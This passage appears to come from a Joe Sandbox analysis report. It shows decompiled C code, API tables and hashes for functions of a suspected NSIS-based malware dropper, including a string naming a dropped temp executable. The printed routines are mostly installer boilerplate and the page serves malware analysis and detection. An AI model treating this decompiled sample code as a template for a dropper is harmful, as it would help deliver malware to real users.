                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                          • String ID: $M$N
                                                          • API String ID: 1638840714-813528018
                                                          • Opcode ID: 7416ecd40991322695bfc66f84475ccc40ce6f5cb9d88326faa3f420c439a296
                                                          • Instruction ID: 4dc87105461fa9cd210088c80ac17c321b9292d6232489b395004e578f78c6e7
                                                          • Opcode Fuzzy Hash: 7416ecd40991322695bfc66f84475ccc40ce6f5cb9d88326faa3f420c439a296
                                                          • Instruction Fuzzy Hash: F0028EB0E00209AFDB20DF54DD45AAE7BB5EB84315F10817AF610BA2E1D7799A81CF58
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00404333 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 242stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 64%
                                                          			E00404333(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr* _t81;
				int _t86;
				int _t88;
				int _t100;
				signed int _t105;
				char* _t110;
				intOrPtr _t113;
				intOrPtr* _t127;
				signed int _t139;
				signed int _t144;
				CHAR* _t150;

				_t75 =  *0x41fd00;
				_v36 = _t75;
				_t150 = ( *(_t75 + 0x3c) << 0xa) + 0x424000;
				_v12 =  *((intOrPtr*)(_t75 + 0x38));
				if(_a8 == 0x40b) {
					E004053A6(0x3fb, _t150);
					E00405D03(_t150);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							_t144 = _t143 | 0xffffffff;
							E004053A6(0x3fb, _t150);
							if(E004056C8(_t169, _t150) == 0) {
								_v8 = 1;
							}
							E00405AF4(0x41f4f8, _t150);
							_t80 = E0040567B(0x41f4f8);
							if(_t80 != 0) {
								 *_t80 =  *_t80 & 0x00000000;
							}
							_t81 = E00405DDA(0);
							if(_t81 == 0) {
								L29:
								_t86 = GetDiskFreeSpaceA(0x41f4f8,  &_v20,  &_v28,  &_v16,  &_v40);
								__eflags = _t86;
								if(_t86 == 0) {
									goto L32;
								}
								_t100 = _v20 * _v28;
								__eflags = _t100;
								_t144 = MulDiv(_t100, _v16, 0x400);
								goto L31;
							} else {
								_push( &_v32);
								_push( &_v24);
								_push( &_v44);
								_push(0x41f4f8);
								if( *_t81() == 0) {
									goto L29;
								}
								_t144 = (_v40 << 0x00000020 | _v44) >> 0xa;
								L31:
								_v12 = 1;
								L32:
								if(_t144 < E00404741(5)) {
									_v8 = 2;
								}
								if( *((intOrPtr*)( *0x4236fc + 0x10)) != 0) {
									E0040468C(0x3ff, 0xfffffffb, _t87);
									if(_v12 == 0) {
										SetDlgItemTextA(_a4, 0x400, 0x41f4e8);
									} else {
										E0040468C(0x400, 0xfffffffc, _t144);
									}
								}
								_t88 = _v8;
								 *0x423fc4 = _t88;
								if(_t88 == 0) {
									_v8 = E0040140B(7);
								}
								if(( *(_v36 + 0x14) & 0x00000400) != 0) {
									_v8 = 0;
								}
								E00403F17(0 | _v8 == 0x00000000);
								if(_v8 == 0 &&  *0x42051c == 0) {
									E004042C8();
								}
								 *0x42051c = 0;
								goto L46;
							}
						}
						_t169 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L46;
						}
						goto L22;
					}
					_t105 = _a12 & 0x0000ffff;
					if(_t105 != 0x3fb) {
						L12:
						if(_t105 == 0x3e9) {
							_t139 = 7;
							memset( &_v72, 0, _t139 << 2);
							_t143 = 0x420530;
							_v76 = _a4;
							_v68 = 0x420530;
							_v56 = E00404626;
							_v52 = _t150;
							_v64 = E00405B16(0x3fb, 0x420530, _t150);
							_t110 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t110, 0x41f900, _v12);
							if(_t110 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t110);
								E004055E7(_t150);
								_t113 =  *((intOrPtr*)( *0x423f28 + 0x11c));
								if(_t113 != 0 && _t150 == "C:\\Users\\Albus\\AppData\\Local\\Temp") {
									_push(_t113);
									_push(0);
									E00405B16(0x3fb, 0x420530, _t150);
									_t143 = 0x422ec0;
									if(lstrcmpiA(0x422ec0, 0x420530) != 0) {
										lstrcatA(_t150, 0x422ec0);
									}
								}
								 *0x42051c =  *0x42051c + 1;
								SetDlgItemTextA(_a4, 0x3fb, _t150);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L46;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t143 = GetDlgItem(_a4, 0x3fb);
					if(E00405654(_t150) != 0 && E0040567B(_t150) == 0) {
						E004055E7(_t150);
					}
					 *0x4236f8 = _a4;
					SetWindowTextA(_t143, _t150);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403EF5(_a4);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403EF5(_a4);
					E00403F2A(_t143);
					_t127 = E00405DDA(7);
					if(_t127 == 0) {
						L46:
						return E00403F5C(_a8, _a12, _a16);
					}
					 *_t127(_t143, 1);
					goto L8;
				}
			}




































                                                          0x00404339
                                                          0x00404340
                                                          0x0040434c
                                                          0x0040435a
                                                          0x00404362
                                                          0x00404366
                                                          0x0040436c
                                                          0x0040436c
                                                          0x00404378
                                                          0x004043ea
                                                          0x004043f1
                                                          0x004044c6
                                                          0x004044cd
                                                          0x004044dc
                                                          0x004044dc
                                                          0x004044e0
                                                          0x004044e6
                                                          0x004044e9
                                                          0x004044f6
                                                          0x004044f8
                                                          0x004044f8
                                                          0x00404506
                                                          0x0040450c
                                                          0x00404513
                                                          0x00404515
                                                          0x00404515
                                                          0x0040451a
                                                          0x00404526
                                                          0x0040454a
                                                          0x0040455b
                                                          0x00404561
                                                          0x00404563
                                                          0x00000000
                                                          0x00000000
                                                          0x00404569
                                                          0x00404569
                                                          0x00404577
                                                          0x00000000
                                                          0x00404528
                                                          0x0040452b
                                                          0x0040452f
                                                          0x00404533
                                                          0x00404534
                                                          0x00404539
                                                          0x00000000
                                                          0x00000000
                                                          0x00404541
                                                          0x00404579
                                                          0x00404579
                                                          0x00404580
                                                          0x00404589
                                                          0x0040458b
                                                          0x0040458b
                                                          0x0040459d
                                                          0x004045a7
                                                          0x004045af
                                                          0x004045c5
                                                          0x004045b1
                                                          0x004045b5
                                                          0x004045b5
                                                          0x004045af
                                                          0x004045ca
                                                          0x004045cf
                                                          0x004045d4
                                                          0x004045dd
                                                          0x004045dd
                                                          0x004045e6
                                                          0x004045e8
                                                          0x004045e8
                                                          0x004045f4
                                                          0x004045fc
                                                          0x00404606
                                                          0x00404606
                                                          0x0040460b
                                                          0x00000000
                                                          0x0040460b
                                                          0x00404526
                                                          0x004044cf
                                                          0x004044d6
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004044d6
                                                          0x004043f7
                                                          0x004043fd
                                                          0x00404417
                                                          0x0040441c
                                                          0x00404426
                                                          0x0040442d
                                                          0x00404432
                                                          0x0040443c
                                                          0x0040443f
                                                          0x00404442
                                                          0x00404449
                                                          0x00404451
                                                          0x00404454
                                                          0x00404458
                                                          0x0040445f
                                                          0x00404467
                                                          0x004044bf
                                                          0x00404469
                                                          0x0040446a
                                                          0x00404471
                                                          0x0040447b
                                                          0x00404483
                                                          0x0040448d
                                                          0x0040448e
                                                          0x00404490
                                                          0x00404496
                                                          0x004044a4
                                                          0x004044a8
                                                          0x004044a8
                                                          0x004044a4
                                                          0x004044ad
                                                          0x004044b8
                                                          0x004044b8
                                                          0x00404467
                                                          0x00000000
                                                          0x0040441c
                                                          0x0040440a
                                                          0x00000000
                                                          0x00000000
                                                          0x00404410
                                                          0x00000000
                                                          0x0040437a
                                                          0x00404385
                                                          0x0040438e
                                                          0x0040439b
                                                          0x0040439b
                                                          0x004043a5
                                                          0x004043aa
                                                          0x004043b3
                                                          0x004043b6
                                                          0x004043bb
                                                          0x004043c3
                                                          0x004043c6
                                                          0x004043cb
                                                          0x004043d1
                                                          0x004043d8
                                                          0x004043df
                                                          0x00404611
                                                          0x00404623
                                                          0x00404623
                                                          0x004043e8
                                                          0x00000000
                                                          0x004043e8

                                                          APIs
                                                          • GetDlgItem.USER32(?,000003FB), ref: 0040437E
                                                          • SetWindowTextA.USER32(00000000,?), ref: 004043AA
                                                          • SHBrowseForFolderA.SHELL32(?,0041F900,?), ref: 0040445F
                                                          • CoTaskMemFree.OLE32(00000000), ref: 0040446A
                                                          • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw,00420530,00000000,?,?), ref: 0040449C
                                                          • lstrcatA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw), ref: 004044A8
                                                          • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004044B8
                                                            • Part of subcall function 004053A6: GetDlgItemTextA.USER32 ref: 004053B9
                                                            • Part of subcall function 00405D03: CharNextA.USER32(?), ref: 00405D5B
                                                            • Part of subcall function 00405D03: CharNextA.USER32(?), ref: 00405D68
                                                            • Part of subcall function 00405D03: CharNextA.USER32(?), ref: 00405D6D
                                                            • Part of subcall function 00405D03: CharPrevA.USER32(?,?), ref: 00405D7D
                                                          • GetDiskFreeSpaceA.KERNEL32(0041F4F8,?,?,0000040F,?,00000000,0041F4F8,0041F4F8,?,?,000003FB,?), ref: 0040455B
                                                          • MulDiv.KERNEL32 ref: 00404571
                                                          • SetDlgItemTextA.USER32(00000000,00000400,0041F4E8), ref: 004045C5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                          • String ID: A$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw
                                                          • API String ID: 2246997448-2645686078
                                                          • Opcode ID: cb80a268bf24ae7fe0fa1031d8768fc716fd5deb7f04e988c4d677ddd980eb03
                                                          • Instruction ID: 4b0f1e9708c527d2056c04b062cf11215df66417efe2c712fcd6d6fb4e9790ff
                                                          • Opcode Fuzzy Hash: cb80a268bf24ae7fe0fa1031d8768fc716fd5deb7f04e988c4d677ddd980eb03
                                                          • Instruction Fuzzy Hash: 7B817CB1900218BBDB11AFA1DC45A9F7BB8EF45314F00843AFA05B62D1D77C9A41CF69
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00402078 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132comCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 74%
                                                          			E00402078(void* __eflags) {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E00402A85(0xfffffff0);
				_t96 = E00402A85(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E00402A85(2);
				 *((intOrPtr*)(_t100 - 0x3c)) = E00402A85(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x34)) = E00402A85(0x45);
				if(E00405654(_t96) == 0) {
					E00402A85(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407380, _t75, 1, 0x407370, _t44);
				if(_t44 < _t75) {
					L12:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407390, _t100 - 8);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\Albus\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0x3c)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0x3c)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x34)));
						if(_t95 >= _t75) {
							 *0x40a800 = _t75;
							MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x40a800, 0x400);
							_t69 =  *((intOrPtr*)(_t100 - 8));
							_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x40a800, 1);
						}
						_t66 =  *((intOrPtr*)(_t100 - 8));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L12;
					}
				}
				E00401423();
				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                                                          0x00402081
                                                          0x0040208b
                                                          0x00402094
                                                          0x0040209e
                                                          0x004020a7
                                                          0x004020b1
                                                          0x004020b5
                                                          0x004020b5
                                                          0x004020ba
                                                          0x004020cb
                                                          0x004020d3
                                                          0x004021b1
                                                          0x004021b1
                                                          0x004021b8
                                                          0x004020d9
                                                          0x004020d9
                                                          0x004020ea
                                                          0x004020ee
                                                          0x004020f4
                                                          0x004020fe
                                                          0x00402100
                                                          0x0040210b
                                                          0x0040210e
                                                          0x0040211b
                                                          0x0040211d
                                                          0x0040211f
                                                          0x00402126
                                                          0x00402129
                                                          0x00402129
                                                          0x0040212c
                                                          0x00402136
                                                          0x0040213e
                                                          0x00402143
                                                          0x0040214f
                                                          0x0040214f
                                                          0x00402152
                                                          0x0040215b
                                                          0x0040215e
                                                          0x00402167
                                                          0x0040216c
                                                          0x0040217e
                                                          0x00402187
                                                          0x0040218d
                                                          0x00402199
                                                          0x00402199
                                                          0x0040219b
                                                          0x004021a1
                                                          0x004021a1
                                                          0x004021a4
                                                          0x004021aa
                                                          0x004021af
                                                          0x004021c4
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004021af
                                                          0x004021ba
                                                          0x0040291d
                                                          0x00402929

                                                          APIs
                                                          • CoCreateInstance.OLE32(00407380,?,00000001,00407370,?), ref: 004020CB
                                                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,0040A800,00000400,?,00000001,00407370,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402187
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp, xrefs: 00402103
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: ByteCharCreateInstanceMultiWide
                                                          • String ID: C:\Users\user\AppData\Local\Temp
                                                          • API String ID: 123533781-2935972921
                                                          • Opcode ID: 99d1c9485c2385a05d6def83f54491c2fe2eae754645da680941b60363c3e806
                                                          • Instruction ID: 398a92e667fa01929b708865028928fdc90e398ffceaacaabec111818001f34d
                                                          • Opcode Fuzzy Hash: 99d1c9485c2385a05d6def83f54491c2fe2eae754645da680941b60363c3e806
                                                          • Instruction Fuzzy Hash: 96418E75A00204BFCB04EFA4CD88E9E7BB5EF89314B204169F905EB2D1CB799D41CB65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405DDA Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00405DDA(signed int _a4) {
				struct HINSTANCE__* _t5;
				CHAR* _t7;
				signed int _t9;

				_t9 = _a4 << 3;
				_t2 = _t9 + 0x409298; // 0x4b004178
				_t7 =  *_t2;
				_t5 = GetModuleHandleA(_t7);
				if(_t5 != 0) {
					L2:
					_t3 = _t9 + 0x40929c; // 0x454e5245
					return GetProcAddress(_t5,  *_t3);
				}
				_t5 = LoadLibraryA(_t7);
				if(_t5 != 0) {
					goto L2;
				}
				return _t5;
			}






                                                          0x00405de2
                                                          0x00405de5
                                                          0x00405de5
                                                          0x00405dec
                                                          0x00405df4
                                                          0x00405e01
                                                          0x00405e01
                                                          0x00000000
                                                          0x00405e08
                                                          0x00405df7
                                                          0x00405dff
                                                          0x00000000
                                                          0x00000000
                                                          0x00405e10

                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(4B004178,?,00000000,0040584D,00000001,?,00000000,?,?,004055D7,?,00000000,000000F1,?), ref: 00405DEC
                                                          • LoadLibraryA.KERNEL32(4B004178), ref: 00405DF7
                                                          • GetProcAddress.KERNEL32(00000000,454E5245,?,00000000,0040584D,00000001,?,00000000,?,?,004055D7,?,00000000,000000F1,?), ref: 00405E08
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: AddressHandleLibraryLoadModuleProc
                                                          • String ID:
                                                          • API String ID: 310444273-0
                                                          • Opcode ID: 48fff7582a584f5b534c5f4fb96ac49351284891df118ff32f91dc10e886df39
                                                          • Instruction ID: 23adcdfa12f808958732e8448d219f11259a2274de98c66bb9e29e692012a426
                                                          • Opcode Fuzzy Hash: 48fff7582a584f5b534c5f4fb96ac49351284891df118ff32f91dc10e886df39
                                                          • Instruction Fuzzy Hash: 27E0C232A08510ABD7118B20ED48D6B73ADEF897403080C3EF549F6190C734ED91EBEA
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004026A1 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 39%
                                                          			E004026A1(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402A85(2), _t19 - 0x194) != 0xffffffff) {
					E00405A52(__edi, _t6);
					_push(_t19 - 0x168);
					_push(__esi);
					E00405AF4();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                                          0x004026b9
                                                          0x004026cd
                                                          0x004026d8
                                                          0x004026d9
                                                          0x00402840
                                                          0x004026bb
                                                          0x004026bb
                                                          0x004026bd
                                                          0x004026bf
                                                          0x004026bf
                                                          0x0040291d
                                                          0x00402929

                                                          APIs
                                                          • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004026B0
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: FileFindFirst
                                                          • String ID:
                                                          • API String ID: 1974802433-0
                                                          • Opcode ID: 13df6a17cce9b71cc0419ccd618343e2ee757eb231b356d374ab3b7a298b65eb
                                                          • Instruction ID: 8527613b08e3aea83d48894234c8ec001628bfbd33843c806f329a49b4271005
                                                          • Opcode Fuzzy Hash: 13df6a17cce9b71cc0419ccd618343e2ee757eb231b356d374ab3b7a298b65eb
                                                          • Instruction Fuzzy Hash: 5DF0A7726051009BD700EBA49E49AEF7768DF11314F60057BE141F20C1D6B84A42DB2A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040403D Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 204windowstringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 92%
                                                          			E0040403D(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char* _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x420510 =  *0x420510 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403F5C(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x422ec0;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423f24, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423f24, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x420510 != 0) {
						goto L25;
					} else {
						_t112 =  *0x41fd00 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403F17(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004042C8();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t113 =  *( *0x4236fc - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x423f58;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00404009;
				E00403EF5(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403EF5(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403F17( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403F2A(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x423f28 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x41f4f4 =  *0x41f4f4 & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x420510 =  *0x420510 & 0x00000000;
				return 0;
			}

















                                                          0x0040404d
                                                          0x00404173
                                                          0x004041cf
                                                          0x004041d3
                                                          0x004042aa
                                                          0x004042ac
                                                          0x004042ac
                                                          0x004042b2
                                                          0x004042b2
                                                          0x004042b5
                                                          0x00000000
                                                          0x004042bc
                                                          0x004041e1
                                                          0x004041e3
                                                          0x004041ed
                                                          0x004041f8
                                                          0x004041fb
                                                          0x004041fe
                                                          0x00404209
                                                          0x0040420c
                                                          0x00404213
                                                          0x00404221
                                                          0x00404239
                                                          0x0040424c
                                                          0x0040425c
                                                          0x0040425e
                                                          0x0040425e
                                                          0x00404213
                                                          0x00404268
                                                          0x00000000
                                                          0x00404273
                                                          0x00404277
                                                          0x00404288
                                                          0x00404288
                                                          0x0040428e
                                                          0x0040429c
                                                          0x0040429c
                                                          0x00000000
                                                          0x004042a0
                                                          0x00404268
                                                          0x0040417e
                                                          0x00000000
                                                          0x00404192
